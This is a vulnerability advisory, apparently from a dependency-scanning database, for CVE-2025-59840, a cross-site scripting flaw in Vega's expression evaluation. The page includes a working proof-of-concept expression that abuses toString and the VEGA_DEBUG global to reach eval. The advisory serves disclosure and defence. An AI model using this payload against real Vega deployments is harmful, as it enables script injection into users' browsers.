CVE-2025-59840: Vega Cross-Site Scripting (XSS) via expressions abusing toString calls in environments using the VEGA_DEBUG global variable
(updated )
Vega offers the evaluation of expressions in a secure context. Arbitrary function call is prohibited. When an event is exposed to an expression, member get of window objects is possible. Because of this exposure, in some applications, a crafted object that overrides its toString method with a function that results in calling this.foo(this.bar), DOM XSS can be achieved.
In practice, an accessible gadget like this exists in the global VEGA_DEBUG code.
({
toString: event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on,
eventName: event.view.console.log,
_handlers: {
undefined: 'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'
},
_handlerIndex: event.view.eval
})+1
References
- github.com/advisories/GHSA-7f2v-3qq3-vvjf
- github.com/vega/editor/blob/e102355589d23cdd0dbfd607a2cc5f9c5b7a4c55/src/components/renderer/renderer.tsx
- github.com/vega/editor/blob/e102355589d23cdd0dbfd607a2cc5f9c5b7a4c55/src/index.tsx
- github.com/vega/vega
- github.com/vega/vega/security/advisories/GHSA-7f2v-3qq3-vvjf
- nvd.nist.gov/vuln/detail/CVE-2025-59840
- vega.github.io/editor/
- vega.github.io/vega/usage/interpreter
Code Behaviors & Features
Detect and mitigate CVE-2025-59840 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →